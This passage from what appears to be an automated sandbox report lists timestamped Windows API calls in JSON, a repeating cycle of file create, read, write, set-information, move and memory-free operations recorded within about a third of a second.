"filesystem", "timestamp": "2016-02-16 
17:41:54,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,961", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,981", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,001", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,001", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,001", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,001", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,001", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,011", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,011", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,021", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,031", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,041", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,051", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:55,081", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,081", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,091", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:55,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,101", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,111", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,111", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,121", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,121", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,131", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:55,131", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,131", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,141", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,141", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,141", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,151", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,151", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,161", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,161", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,161", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:55,171", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,171", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,171", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,181", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:55,192", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,192", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,192", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,202", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,202", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,212", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,212", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,212", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,212", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,212", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,212", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,222", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,222", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,222", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,232", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,232", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,242", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,242", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,252", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,252", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,262", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,262", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,272", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,282", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,282", "api": 